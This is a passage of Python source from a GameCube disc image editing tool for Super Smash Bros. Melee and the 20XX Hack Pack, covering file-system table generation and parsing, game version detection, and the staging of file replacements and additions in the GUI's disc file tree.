			if programClosing: return totalFiles, entryOffset
			elif entryName == sysFolder: continue
			elif len( os.path.splitext(entryName)[0] ) >= 30: # This is the max character length for file names
				filenamesTooLong.append( directory + '/' + entryName )
				continue
			fullPath = directory + '/' + entryName
			# Get the relative difference between these paths
			isoPath = gameId + directory.replace( rootPath, '' )
			parent = isoPath.lower()
			# Differentiate between new subdirectory or file
			if os.path.isdir( fullPath ):
				isoPath += '/' + entryName
				addItemToDiscFileTree( True, isoPath, entryName, entryOffset, '', parent, source, fullPath )
				totalFiles, entryOffset = loadItemsInDirectory( fullPath, totalFiles, entryOffset )
			else:
				# Consider alignment adjustment for the last file and padding, to be added to the offset for this file.
				alignmentAdjustment = roundTo32( entryOffset, base=4 ) - entryOffset # i.e. how many bytes away from being aligned.
				entryOffset += alignmentAdjustment
				entryLength = int( os.path.getsize(fullPath) )
				addItemToDiscFileTree( False, isoPath, entryName, entryOffset, entryLength, parent, source, fullPath )
				# Determine the offset for the next file (excluding padding).
				entryOffset += entryLength
				totalFiles += 1
		return totalFiles, entryOffset
	totalFiles, entryOffset = loadItemsInDirectory( rootPath, totalFiles, entryOffset ) # entryOffset will be the total space used by all non-system files, including alignment adjustments.
	# Now that the CSS has been loaded in the treeview, we can update the stage names using it
	if globalDiscDetails['isMelee']: setStageDescriptions()
	# Generate a new FST based on the files shown in the GUI, and determine how much space it will use
	newFstData = generateFST()
	fstFileSize = len( newFstData )/2
	alignmentAdjustment = roundTo32( fstFileSize, base=4 ) - fstFileSize # i.e. how many bytes away from being aligned.
	spaceForHeaderAndSystemFiles = fstOffset + fstFileSize + alignmentAdjustment
	# Add the FST to the file tree
	addItemToDiscFileTree( False, gameId, 'Game.toc', fstOffset, fstFileSize, gameId.lower() + '/sys', 'ram', newFstData )
	# Determine how much padding to allocate between files.
	if not gcrSystemFiles: totalNonSystemFiles = totalFiles - 4
	else: totalNonSystemFiles = totalFiles - 3
	interFilePaddingLength = getInterFilePaddingLength( totalNonSystemFiles, spaceForHeaderAndSystemFiles + entryOffset )
	# Now that the size (length) of inter-file padding and all system files are known, update the offsets of all items
	def updateEntryOffsets( parentIid, paddingDisplacement ): # Updates each file item's displayed offset, accumulating padding per file.
		# Bug fix: previously returned 0 here, which would discard the accumulated padding
		# displacement if the system files folder weren't the first item encountered.
		if parentIid == gameId.lower() + '/sys': return paddingDisplacement
		for iid in Gui.isoFileTree.get_children( parentIid ):
			iidValues = Gui.isoFileTree.item( iid, 'values' )
			if iidValues[1] == 'file':
				paddingDisplacement += interFilePaddingLength # This is cumulative, for each file
				try: newOffset = int( iidValues[2], 16 ) + spaceForHeaderAndSystemFiles + paddingDisplacement
				except: newOffset = 'n/a'
				Gui.isoFileTree.item( iid, values=(iidValues[0], iidValues[1], uHex(newOffset), iidValues[3], iidValues[4], iidValues[5], iidValues[6]) )
			else: # This is a folder
				paddingDisplacement = updateEntryOffsets( iid, paddingDisplacement )
		return paddingDisplacement
	paddingDisplacement = updateEntryOffsets( '', 0 )
	globalDiscDetails['rebuildRequired'] = True
	# Update the file count display (on the disc details tab) and program status
	Gui.isoFileCountText.set( "{:,}".format(totalFiles) )
	updateProgramStatus( 'Root Scan Complete' )
	# Update the treeview's header text and its function call for the next (reversed) sort.
	Gui.isoFileTree.heading( '#0', text='File (Sorted by FST)' )
	Gui.isoFileTree.heading( '#0', command=lambda: treeview_sort_column(Gui.isoFileTree, 'file', False) )
	if filenamesTooLong:
		msg( 'These files were excluded, because their file name is longer than 29 characters:\n\n' + '\n'.join( filenamesTooLong ) )
	if updateDetailsTab:
		predictedFinalDiscSize = spaceForHeaderAndSystemFiles + entryOffset + paddingDisplacement
		populateDiscDetails( discSize=predictedFinalDiscSize )
def readFST( fstData ):
	""" Parses a GC disc's FST/TOC (File System Table/Table of Contents), and builds a list of
		entries (files and folders), along with their corresponding names. Input is a hex string, because this is an old function. :/ """
	# The entry count lives at bytes 0x8-0xC of the root entry (nibbles 16-24 of the hex string)
	numberOfEntries = int( fstData[16:24], 16 )
	entriesSectionLen = numberOfEntries * 0xC * 2 # Each entry is 0xC bytes; x2 to count hex nibbles
	entriesSection = fstData[:entriesSectionLen]
	# Chop the entries section into one 0x18-nibble (0xC-byte) chunk per file/folder entry
	entries = []
	for chunkStart in xrange( 0, len(entriesSection), 0x18 ):
		entries.append( entriesSection[chunkStart:chunkStart+0x18] )
	# Everything after the entries section is the table of null-terminated file name strings
	strings = fstData[entriesSectionLen:].decode('hex').split('\x00')
	return ( numberOfEntries, entries, strings )
def generateFST(): # Generates and returns a new File System Table (Game.toc).
	""" Builds a new FST as a hex string from the files and folders currently shown in
		the Disc File Tree (excluding the system files). The returned string is the
		entries section, followed immediately by the string table of null-terminated
		file names (both hex-encoded). """
	# NOTE(review): get_children() with no argument returns a tuple of top-level iids, not a
	# single iid; this appears to rely on the tree having exactly one root item — confirm.
	rootIid = Gui.isoFileTree.get_children()
	gameId = globalDiscDetails['gameId'].lower()
	def childItemCount( folder, gameId ): # Recursively get the count of all items (both files and folders) in the given folder.
		itemCount = 0
		for iid in Gui.isoFileTree.get_children( folder ):
			if iid == gameId + '/sys': continue # Skip the system files
			iidValues = Gui.isoFileTree.item( iid, 'values' )
			if iidValues[1] == 'file': itemCount += 1
			else:
				# Search the inner folder, and add the totals of the children within to the current count.
				itemCount += childItemCount( iid, gameId )
				if iidValues[2] == 'native': itemCount += 1 # Counts folders only if they're originally from the ISO.
		return itemCount
	gameItemCount = childItemCount( rootIid, gameId ) + 1 # +1 to include the root entry itself
	entries = [ '0100000000000000' + "{0:0{1}X}".format( gameItemCount, 8 ) ] # Starts off with the root entry included.
	stringTable = ['']
	stringTableCharLen = 0
	entryIndex = 1
	def buildEntries( parentIid, stringTableCharLen, entryIndex, gameId ):
		# Recursively appends one 0xC-byte hex entry (and one name) per item, in depth-first
		# order, mutating the enclosing 'entries' and 'stringTable' lists directly.
		for iid in Gui.isoFileTree.get_children( parentIid ):
			if iid == gameId + '/sys': continue # System files aren't included in the FST
			_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
			# Get the directory flag
			if entity == 'folder':
				directoryFlag = '01'
				hierarchicalOffset = "{0:0{1}X}".format( len( iid.split('/') ) - 2, 8 ) # This is actually entryIndexOfParent #tofix
				length = "{0:0{1}X}".format( entryIndex + childItemCount( iid, gameId ) + 1, 8 ) # This will be the index of the next file that's not in this directory.
			else:
				directoryFlag = '00'
				hierarchicalOffset = "{0:0{1}X}".format( int(isoOffset, 16), 8 ) # Formats the number in hex, and pads it with zeros to 8 characters.
				length = "{0:0{1}X}".format( int(fileSize), 8 )
			if entity == 'file' or isoOffset == 'native': # Add this entry if it's a file, or if it's a folder that was originally in the ISO.
				# Get the offset for the name in the string table, and the name to add to the string table.
				stringTableOffset = "{0:0{1}X}".format( stringTableCharLen, 6 )
				name = ( isoPath.split('/')[-1] + '\x00').encode('hex')
				# Add the current entry to the entries list and string section.
				entries.append( directoryFlag + stringTableOffset + hierarchicalOffset + length )
				stringTable.append( name )
				stringTableCharLen += len( name ) / 2 # Need to count by bytes, not nibbles.
				entryIndex += 1
			# If this was a folder, build entries for the children it contains.
			if directoryFlag == '01': stringTableCharLen, entryIndex = buildEntries( iid, stringTableCharLen, entryIndex, gameId )
		return stringTableCharLen, entryIndex
	# Collect the info needed to make a FST entry of the current item.
	buildEntries( rootIid, stringTableCharLen, entryIndex, gameId )
	return ''.join( entries ) + ''.join( stringTable )
def getFileTreeFiles( parentIid='' ):
	""" Recursively collects the 'values' tuples of every file item under the given
		treeview item, along with the combined size of those files.
		Returns a 2-tuple: ( list of item values tuples, total file size ). """
	collectedFiles = []
	combinedSize = 0
	for childIid in Gui.isoFileTree.get_children( parentIid ):
		childValues = Gui.isoFileTree.item( childIid, 'values' )
		if childValues[1] == 'file':
			collectedFiles.append( childValues )
			combinedSize += int( childValues[3] ) # File size is stored in the values tuple
		else:
			# A folder; recurse into it and absorb its results
			innerFiles, innerSize = getFileTreeFiles( childIid )
			collectedFiles.extend( innerFiles )
			combinedSize += innerSize
	return collectedFiles, combinedSize
#===================================#
# ~ ~ Secondary Disc Operations ~ ~ #
#===================================#
def discDetected( throwWarnings=True ):
	""" Verifies that a disc image/root path has been loaded into the program and that
		it still exists on disk. Returns True/False; optionally alerts the user when
		the check fails. """
	discPath = globalDiscDetails['isoFilePath']
	if not discPath:
		if throwWarnings: msg( 'No disc image has been loaded.' )
		return False
	if os.path.exists( discPath ):
		return True
	# A path was loaded, but it's no longer present on disk
	if throwWarnings:
		updateProgramStatus( 'Disc Not Found' )
		msg( "Unable to find the disc image. Be sure that the file path is "
			"correct and that it hasn't been moved, renamed, or deleted.", 'Disc Not Found' )
	return False
def pathIsFromDisc( entryField ):
	""" Checks whether the path in the given entry widget refers to a file within the
		loaded disc (i.e. an iid in the Disc File Tree) rather than a standalone file
		(whose path would contain a drive specifier, e.g. "C:"). """
	targetPath = entryField.get().replace( '"', '' )
	if ':' in targetPath: return False # An absolute OS path; not an internal disc path
	return Gui.isoFileTree.exists( targetPath.lower() )
def checkMeleeVersion(): # Checks if the loaded disc is a copy of SSBM
	""" Determines whether the loaded disc is Super Smash Bros. Melee (and which revision),
		by looking for the game's title string at version-specific offsets within the DOL.
		Sets globalDiscDetails['isMelee'] to '00', '01', '02', 'pal', or '' (empty meaning
		not Melee, or the disc/DOL couldn't be read). """
	isMelee = ''
	if os.path.exists( globalDiscDetails['isoFilePath'] ):
		gameId = globalDiscDetails['gameId'].lower()
		dolData = getFileDataFromDiscTreeAsBytes( gameId + '/start.dol' )
		if not dolData:
			print 'The DOL file appears to be absent from the Disc File Tree!'
			globalDiscDetails['isMelee'] = ''
			return
		# Check the DOL for a string of "Super Smash Bros. Melee"
		ssbmStringBytes = bytearray()
		ssbmStringBytes.extend( "Super Smash Bros. Melee" )
		# The title string lives at a different DOL offset in each game revision
		if dolData[0x3B78FB:0x3B7912] == ssbmStringBytes: isMelee = '02' # i.e. version 1.02 (most common; so checking for it first)
		elif dolData[0x3B6C1B:0x3B6C32] == ssbmStringBytes: isMelee = '01' # i.e. version 1.01
		elif dolData[0x3B5A3B:0x3B5A52] == ssbmStringBytes: isMelee = '00' # i.e. version 1.00
		elif dolData[0x3B75E3:0x3B75FA] == ssbmStringBytes: isMelee = 'pal' # i.e. PAL
	globalDiscDetails['isMelee'] = isMelee
def check20xxVersion( fstEntries=None, fstStrings=None ):
	""" Determines whether the loaded disc (or root folder) is a version of the 20XX Hack Pack,
		by examining its CSS file (MnSlChr). The version returned may be 3.02, 3.02.01, 3.03,
		BETA 01, BETA 02, BETA 03, BETA 04, 4.05, or higher future versions following the x.xx format.
		Sets globalDiscDetails['is20XX'] to an empty string if the disc does not appear to be a version of 20XXHP.

			fstEntries/fstStrings: a parsed FST (from readFST) when working from a disc image;
			if omitted, globalDiscDetails['isoFilePath'] is treated as a root folder. """
	# Get the MnSlChr file (either from a root folder or disc file)
	cssData = None
	if fstEntries: # Dealing with a disc image file
		i = 0
		for entry in fstEntries[1:]: # Skips the first (root) entry.
			if entry[1] == '1': # Skip folders
				i += 1
				continue
			# Check if it's the CSS file
			if fstStrings[i].startswith( 'MnSlChr.' ):
				entryOffset = int( entry[8:16], 16 )
				entryLength = int( entry[16:24], 16 )
				# CSS data located. Retrieve it
				with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
					isoBinary.seek( entryOffset )
					cssData = bytearray( isoBinary.read(entryLength) )
				break
			i += 1
	else: # Dealing with a root folder, need to grab the file from the OS filesystem
		# Look for the CSS file name
		for item in os.listdir( globalDiscDetails['isoFilePath'] ):
			if item.startswith( 'MnSlChr.' ):
				cssFilePath = globalDiscDetails['isoFilePath'] + '\\' + item # NOTE(review): backslash separator assumes Windows — confirm
				with open( cssFilePath, 'rb') as cssFile:
					cssData = bytearray( cssFile.read() )
				break
	# Make sure data was found
	if not cssData: # CSS file not found
		globalDiscDetails['is20XX'] = ''
		return
	# Check the file length of MnSlChr (the CSS); if it's abnormally larger than vanilla, it's 20XX post-v3.02
	fileSize = toInt( cssData[:4] ) # presumably the DAT header's file-size field (first 4 bytes)
	if fileSize > 0x3a2849: # Comparing against the vanilla file size.
		# Isolate a region in the file that may contain the version string.
		versionStringRange = cssData[0x3a4cd0:0x3a4d00]
		# Create a bytearray representing "VERSION " to search for in the region defined above
		versionBytes = bytearray.fromhex( '56455253494f4e20' ) # the hex for "VERSION "
		versionStringPosition = findBytes( versionStringRange, versionBytes )
		if versionStringPosition != -1: # The string was found
			# The version value is the null-terminated text immediately following "VERSION "
			versionValue = versionStringRange[versionStringPosition+8:].split(b'\x00')[0].decode( 'ascii' )
			if versionValue == 'BETA': # Determine the specific beta version; 01, 02, or 03 (BETA 04 identified separately)
				firstDifferentByte = cssData[0x3a47b5]
				if firstDifferentByte == 249 and hexlify( cssData[0x3b905e:0x3b9062] ) == '434f4445': # Hex for the string "CODE"
					versionValue += ' 01'
				elif firstDifferentByte == 249: versionValue += ' 02'
				elif firstDifferentByte == 250: versionValue += ' 03'
				else: versionValue = ''
			elif versionValue == 'BETA04': versionValue = 'BETA 04'
			globalDiscDetails['is20XX'] = versionValue
		elif fileSize == 0x3a5301: globalDiscDetails['is20XX'] = '3.03'
		elif fileSize == 0x3a3bcd: globalDiscDetails['is20XX'] = '3.02.01' # Source: https://smashboards.com/threads/the-20xx-melee-training-hack-pack-v4-05-update-3-17-16.351221/page-68#post-18090881
		else: globalDiscDetails['is20XX'] = ''
	elif cssData[0x310f9] == 0x33: # In vanilla Melee, this value is '0x48'
		globalDiscDetails['is20XX'] = '3.02'
	else: globalDiscDetails['is20XX'] = ''
def isRootFolder( folderPath, showError=True ):
	""" Checks a given file/folder path to see if it's a disc root folder (i.e. a folder of files needed to build a disc).
		Returns 3 values: Bool on whether the folder is a disc root folder, a string for the system files folder, and
		a Bool on whether it's in the form output/used by GCRebuilder. """
	if not os.path.isdir( folderPath ): return False, '', False
	# Determine the name of the system files folder (it varies by which program extracted the disc)
	sysFolder = ''
	for candidateName in ( 'System files', 'SystemFiles', '&&systemdata' ):
		if os.path.exists( folderPath + '/' + candidateName ):
			sysFolder = candidateName
			break
	if not sysFolder:
		if showError: msg( 'No system files were found!\n\nThey should be in a folder called "System files" (or "&&systemdata", if the disc was extracted using GC Rebuilder).' )
		return False, '', False
	# Verify each required system file exists. GC Rebuilder roots provide a combined
	# iso.hdr in place of boot.bin/bi2.bin, which is also acceptable.
	missingSysFiles = []
	gcrSystemFiles = False # The 'format' of the extracted files; i.e. whether the root was exported via DTW or GCR
	for systemFile in ( 'boot.bin', 'bi2.bin', 'apploader.ldr', 'start.dol' ):
		if os.path.exists( folderPath + '/' + sysFolder + '/' + systemFile ): continue
		if systemFile.endswith( '.bin' ) and os.path.exists( folderPath + '/' + sysFolder + '/iso.hdr' ):
			gcrSystemFiles = True
		else:
			missingSysFiles.append( systemFile )
	if missingSysFiles:
		if showError: msg( 'Warning! The following system files could not be found, and are necessary for building the disc:\n\n' + '\n'.join(missingSysFiles) )
		return False, '', False
	return True, sysFolder, gcrSystemFiles
def replaceFileInDisc( iid, newExternalFilePath, iidValues, orig20xxVersion, origMainBuildNumber ):
	""" Stages an external file to replace an existing file in the disc (the treeview item
		given by iid). Sanity-checks the replacement by comparing the two files' string
		tables, and warns on 20XX CSS version mismatches; the user may override either
		warning. Returns True if the file was staged for import (the disc itself isn't
		modified until saving), or False if the user declined. May also auto-generate CSP
		trim colors for 20XX character alt-costume files. """
	_, entity, isoOffset, fileSize, isoPath, _, _ = iidValues # description, entity, isoOffset, fileSize, isoPath, source, data
	# Get the strings table of the original file
	originalFileData = getFileDataFromDiscTreeAsBytes( iid=iid )
	originalStringDict = parseStringTable( originalFileData )[2]
	# Get the strings table of the new file
	with open( newExternalFilePath, 'rb' ) as newFile:
		newFileData = newFile.read()
		newStringDict = parseStringTable( newFileData )[2]
	# Get just the strings, and sort them so they're in the same order (we only care that the same ones exist)
	origFileStrings = sorted( originalStringDict.values() )
	newFileStrings = sorted( newStringDict.values() )
	# Check that this is an appropriate replacement file by comparing the strings of the two files
	if not origFileStrings == newFileStrings:
		# (fixed typo in user-facing message: "does't" -> "doesn't")
		if not tkMessageBox.askyesno( 'Warning! File Mismatch', """The file you're """ + 'importing, "' + os.path.basename(newExternalFilePath) + """", doesn't appear """
			'to be a valid replacement for "' + os.path.basename(isoPath) + '".\n\nAre you sure you want to do this?' ): return False
	# If the file being imported is the CSS. Check if it's for the right game version
	elif 'MnSelectChrDataTable' in newFileStrings:
		if orig20xxVersion != '':
			cssfileSize = os.path.getsize( newExternalFilePath )
			proposed20xxVersion = globalDiscDetails['is20XX']
			# Derive the major build number of the currently-loaded 20XX version
			if proposed20xxVersion:
				if 'BETA' in proposed20xxVersion: proposedMainBuildNumber = int( proposed20xxVersion[-1] )
				else: proposedMainBuildNumber = int( proposed20xxVersion[0] )
			else: proposedMainBuildNumber = 0
			if orig20xxVersion == '3.02': pass # Probably all CSS files will work for this, even the extended 3.02.01 or 4.0x+ files
			elif cssfileSize < 0x3A3BCD: # importing a vanilla CSS over a 20XX CSS
				if not tkMessageBox.askyesno( 'Warning! 20XX File Version Mismatch', """The CSS file you're """ + 'importing, "' + os.path.basename(newExternalFilePath) + """", is for a standard """
					'copy of Melee (or a very early version of 20XX), and will not natively work for post-v3.02 versions of 20XX. Alternatively, you can extract '
					"textures from this file and import them manually if you'd like.\n\nAre you really sure you want to continue with this import?" ): return False
			elif orig20xxVersion != proposed20xxVersion and origMainBuildNumber != proposedMainBuildNumber: # These are quite different versions
				# (fixed grammar in user-facing message: "designed for to be used" -> "designed to be used")
				if not tkMessageBox.askyesno( 'Warning! 20XX File Version Mismatch', """The CSS file you're """ + 'importing, "' + os.path.basename(newExternalFilePath) + """", was not """
					'designed to be used with this version of 20XX and may not work. Alternatively, you can extract '
					"textures from this file and import them manually if you'd like.\n\nAre you sure you want to continue with this import?" ): return False
	# Import the file. The original fileSize value is intentionally preserved, for later comparison during the evaluation for saving.
	Gui.isoFileTree.item( iid, values=('Ready to be replaced...', entity, isoOffset, fileSize, isoPath, 'path', newExternalFilePath), tags='changed' )
	# If this is a character file and this is 20XX beyond version 3, generate new CSP trim colors for this costume (if the option is enabled)
	filename = os.path.basename( iid ) # Checking iid because newExternalFilePath might be named something completely different than the standard naming convention
	if generalBoolSettings['autoGenerateCSPTrimColors'].get() and candidateForTrimColorUpdate( filename, orig20xxVersion, origMainBuildNumber ):
		generateTrimColors( fileIid=iid, autonomousMode=True )
	return True
def candidateForTrimColorUpdate( filename, orig20xxVersion, origMainBuildNumber ):
	""" Determines whether a just-imported disc file should have new CSP trim colors
		auto-generated for it. True only for 20XX HP v4+/BETA builds, for character
		('pl'-prefixed; iids are lowercased) L-alt/R-alt costume files, excluding
		Master Hand and Crazy Hand. """
	# Must be a sufficiently recent version of 20XX HP (v4+ or any BETA build)
	if not ( orig20xxVersion and ( origMainBuildNumber > 3 or 'BETA' in orig20xxVersion ) ):
		return False
	# Must be a player/character file
	if not filename.startswith( 'pl' ):
		return False
	# Must be an L-alt or R-alt costume file (the .usd suffixes cover Falcon's red alts)
	if not filename.endswith( ( '.lat', '.rat', 'rl.usd', 'rr.usd' ) ):
		return False
	# Master Hand and Crazy Hand are excluded
	return filename[2:4] not in ( 'mh', 'ch' )
def importSingleIsoFile(): # i.e. replace an existing file in the disc

	""" Prompts the user for an external file and stages it to replace the single file
		currently selected in the Disc File Tree. Only the treeview item is updated
		(marked 'changed'); the disc itself is not modified until the user saves. """

	if not discDetected(): return
	iidSelectionsTuple = Gui.isoFileTree.selection() # Will be an empty string if nothing is selected, or a tuple of iids

	if not iidSelectionsTuple: msg( "Please select a file to replace." ) #\n\nIf you'd like to replace multiple files, "
		#"use the 'Import Multiple Files' option in the Disc Operations menu." )
	elif len( iidSelectionsTuple ) == 1:
		iidValues = Gui.isoFileTree.item( iidSelectionsTuple[0], 'values' )
		_, entity, _, _, isoPath, _, _ = iidValues # description, entity, isoOffset, fileSize, isoPath, source, data

		if entity == 'file':
			ext = os.path.splitext( iidSelectionsTuple[0] )[1]

			# Set the default filetypes to choose from in the dialog box (the filetype dropdown)
			fileTypeOptions = [ ('Texture data files', '*.dat *.usd *.lat *.rat'), ('Audio files', '*.hps *.ssm'),
								('System files', '*.bin *.ldr *.dol *.toc'), ('Video files', '*.mth *.thp'), ('All files', '*.*') ]

			# Find the option matching the selected file's extension, so it can be listed first in the dropdown
			for typeTuple in fileTypeOptions:
				extensions = typeTuple[1].split()
				if '*' + ext in extensions or ( typeTuple[0] == 'Texture data files' and ext[-2:] == 'at' ):
					orderedFileTypes = [ typeTuple ]
					break
			else: orderedFileTypes = [ ('Same type', '*'+ext) ] # No standard category matched; offer the file's own extension

			# Populate the rest of the possible types to choose from in the dialog box (the filetype dropdown)
			for typeTuple in fileTypeOptions:
				if typeTuple not in orderedFileTypes: orderedFileTypes.append( typeTuple )

			# Prompt the user to choose a file to import
			filePath = tkFileDialog.askopenfilename(
				title="Choose a file to import.",
				initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
				filetypes=orderedFileTypes ) # Should include the appropriate default file types first

			if filePath:
				# Update the default directory to start in when opening or exporting files.
				settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(filePath) )
				with open( settingsFile, 'w' ) as theSettingsFile: settings.write( theSettingsFile )

				# Check if this is a version of 20XX, and if so, get its main build number
				orig20xxVersion = globalDiscDetails['is20XX']
				if orig20xxVersion:
					if 'BETA' in orig20xxVersion: origMainBuildNumber = int( orig20xxVersion[-1] )
					else: origMainBuildNumber = int( orig20xxVersion[0] )
				else: origMainBuildNumber = 0

				# Check that this is an appropriate replacement file, and if so, replace it
				fileReplaced = replaceFileInDisc( iidSelectionsTuple[0], filePath, iidValues, orig20xxVersion, origMainBuildNumber )

				if fileReplaced:
					# Record this change as pending a save to the disc
					global unsavedDiscChanges
					unsavedDiscChanges.append( '"' + isoPath.split('/')[-1] + '" to be replaced with "' + os.path.basename( filePath ) + '".' )
					updateProgramStatus( 'File Replaced. Awaiting Save' )
		else: msg( "Please choose a file to replace for this operation. If you'd like to add new files to this folder, choose 'Add File(s) to Disc'." )
	else: msg( "When selecting files on the Disc File Tree to replace, please only select one file. If you'd like to replace multiple files, "
			"use the 'Import Multiple Files' option in the Disc Operations menu." )
def importMultipleIsoFiles(): # i.e. replace multiple existing files in the disc

	""" Prompts the user for any number of external files and stages each one to
		replace the disc file of the same name (matched by filename against treeview
		iids). Files not found in the disc are skipped and reported. May offer to
		temporarily disable CSP Trim Color generation when importing many costumes. """

	if not discDetected(): return

	filepaths = tkFileDialog.askopenfilename(
		title="Choose files to import.",
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		multiple=True,
		filetypes=[ ('Texture data files', '*.dat *.usd *.lat *.rat'), ('Audio files', '*.hps *.ssm'),
					('System files', '*.bin *.ldr *.dol *.toc'), ('Video files', '*.mth *.thp'), ('All files', '*.*') ]
		)

	if filepaths != '':
		# Update the default directory to start in when opening or exporting files.
		settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(filepaths[-1]) )
		with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )

		gameId = globalDiscDetails['gameId'].lower()
		filesNotInIso = []
		filesReadyForReplacement = 0
		cspColorGenerationTempDisabled = False

		# Check if this is a version of 20XX, and if so, get its main build number
		orig20xxVersion = globalDiscDetails['is20XX']
		if orig20xxVersion:
			if 'BETA' in orig20xxVersion: origMainBuildNumber = int( orig20xxVersion[-1] )
			else: origMainBuildNumber = int( orig20xxVersion[0] )
		else: origMainBuildNumber = 0

		# Offer to temporarily disable CSP Trim color generation if importing many files
		if generalBoolSettings['autoGenerateCSPTrimColors'].get():
			# Check if there are many character files being imported that would need CSP Trim color updates
			totalTrimColorGenerations = 0
			for filepath in filepaths:
				filename = os.path.basename( filepath ).lower()
				if candidateForTrimColorUpdate( filename, orig20xxVersion, origMainBuildNumber ):
					totalTrimColorGenerations += 1
					if totalTrimColorGenerations > 15: break # We've seen enough

			if totalTrimColorGenerations > 15:
				cspColorGenerationTempDisabled = tkMessageBox.askyesno( 'Skip CSP Trim Color Generation?',
					"When importing many alternate character costume files, CSP Trim Color Generation for them all can take a little while. Would you like to temporarily disable "
					"""the option "Auto-Generate CSP Trim Colors" for this operation?\n\nTip: The CSP Trim color data is stored in the MnSlChr (CSS) file, from 0x3A3C90 to """
					"0x3A45E0. So if you'd like to move all of it from one game/file to another, simply open the file in a hex editor and copy that region to your new CSS file "
					"(be sure you are overwriting, rather than inserting). Alternatively, you can use the names in the data table to help you do this for only specific characters." )
				if cspColorGenerationTempDisabled: generalBoolSettings['autoGenerateCSPTrimColors'].set( False )

		# Add the files to the file tree, check for pre-existing files of the same name, and prep the files to import
		for filepath in filepaths: # Folder paths will be excluded by askopenfilename
			# NOTE(review): dashes become path separators here — presumably a filename convention for targeting subfolders; confirm
			fileName = os.path.basename( filepath ).replace( ' ', '_' ).replace( '-', '/' )
			iid = gameId + '/' + fileName.lower()

			if not Gui.isoFileTree.exists( iid ): filesNotInIso.append( fileName )
			else:
				# Update this file's treeview values
				if replaceFileInDisc( iid, filepath, Gui.isoFileTree.item(iid, 'values'), orig20xxVersion, origMainBuildNumber ):
					filesReadyForReplacement += 1

		if filesReadyForReplacement > 0:
			global unsavedDiscChanges
			unsavedDiscChanges.append( str( filesReadyForReplacement ) + ' files ready to be replaced.' )
			updateProgramStatus( 'Files Replaced. Awaiting Save' )

		# Restore the CSP Color Generation option if it was temporarily disabled
		if cspColorGenerationTempDisabled:
			generalBoolSettings['autoGenerateCSPTrimColors'].set( True )

		if filesNotInIso != []: cmsg( 'These files will be skipped, because they could not be found in the disc:\n\n' + '\n'.join(filesNotInIso) )
def determineNewEntryPlacement():

	""" Decides where a newly added file or folder should be placed in the Disc
		File Tree, based on the current treeview selection. Falls back to the end
		of the disc root when nothing is selected.
		Returns a tuple of ( parentIid, insertionIndex, isoPath ). """

	selection = Gui.isoFileTree.selection()

	if not selection:
		# No reference point selected; default to the end of the disc root
		gameId = globalDiscDetails['gameId']
		return gameId.lower(), 'end', gameId

	referenceIid = selection[-1] # Use the lowest-positioned selected item
	itemValues = Gui.isoFileTree.item( referenceIid, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
	entity = itemValues[1]
	isoOffset = itemValues[2]
	isoPath = itemValues[4]

	# Strip the last path segment for files and Convenience Folders
	# ('notNative' marks items that aren't originally part of the disc's file structure)
	if entity == 'file' or isoOffset == 'notNative':
		isoPath = '/'.join( isoPath.split('/')[:-1] )

	return Gui.isoFileTree.parent( referenceIid ), Gui.isoFileTree.index( referenceIid ), isoPath
def addFilesToIso(): # Adds files which did not previously exist in the disc to its filesystem

	""" Prompts the user for one or more external files and stages them as new
		entries in the Disc File Tree, at the location given by
		determineNewEntryPlacement(). Creates any intermediate folders implied by
		dashes in the filename. Skips files that already exist in the disc or whose
		names exceed 29 characters. Flags the disc as requiring a rebuild. """

	if not discDetected(): return

	# Prompt for one or more files to add.
	filepaths = tkFileDialog.askopenfilename(
		title='Choose one or more files (of any format) to add to the disc image.',
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		multiple=True,
		filetypes=[ ('All files', '*.*'), ('Texture data files', '*.dat *.usd *.lat *.rat'), ('Audio files', '*.hps *.ssm'),
					('System files', '*.bin *.ldr *.dol *.toc'), ('Video files', '*.mth *.thp') ]
		)

	if filepaths:
		origParent, index, origIsoPath = determineNewEntryPlacement()

		if origParent == globalDiscDetails['gameId'].lower() + '/sys':
			msg( 'Directories or files cannot be added to the system files folder.' )
			return

		firstItemAdded = ''
		preexistingFiles = []
		filenamesTooLong = []

		# Add the files to the file tree, check for pre-existing files of the same name, and prep the files to import
		for filepath in filepaths: # Folder paths will be excluded by askopenfilename
			# Reset these values; they may have changed by the last file's path (for creating folders)
			parent = origParent
			isoPath = origIsoPath

			# Get the new file's name and size (dashes in the name denote subfolders)
			fileName = os.path.basename( filepath ).replace( ' ', '_' ).replace( '-', '/' )
			fileNameOnly = fileName.split('/')[-1] # Will be no change from the original string if '/' is not present
			fileSize = int( os.path.getsize(filepath) ) # int() required to convert the value from long to int

			# Exclude files with filenames that are too long
			if len( os.path.splitext(fileNameOnly)[0] ) >= 30:
				filenamesTooLong.append( filepath )
				continue

			# Create folders that may be suggested by the filename (if these folders don't exist, the file won't either, so the file-existance check below this wont fail)
			if '/' in fileName:
				for folderName in fileName.split('/')[:-1]: # Ignore the last part, the file name
					isoPath += '/' + folderName
					iid = isoPath.lower()
					if not Gui.isoFileTree.exists( iid ): Gui.isoFileTree.insert( parent, index, iid=iid, text=' ' + folderName,
						values=('', 'folder', 'native', '', isoPath, 'iso', ''), image=Gui.imageBank('folderIcon') )
					parent = iid

			# Exclude files that already exist in the disc
			isoPath += '/' + fileNameOnly
			iid = isoPath.lower()
			if Gui.isoFileTree.exists( iid ):
				preexistingFiles.append( fileName )
				continue

			# Add the file
			Gui.isoFileTree.insert( parent, index, iid=iid, text=' ' + fileNameOnly, values=('Adding to disc...', 'file', '0', fileSize, isoPath, 'path', filepath), tags='changed' )
			if firstItemAdded == '': firstItemAdded = iid
			if index != 'end': index += 1 # Keep subsequent files in their selection order

		# Notify the user of any excluded files
		notifications = ''
		if preexistingFiles: notifications += 'These files were skipped, because they already exist in the disc:\n\n' + '\n'.join(preexistingFiles)
		if filenamesTooLong:
			if notifications: notifications += '\n\n'
			notifications += 'These files were skipped, because their file names are longer than 29 characters:\n\n' + '\n'.join(filenamesTooLong)
		if notifications: msg( notifications )

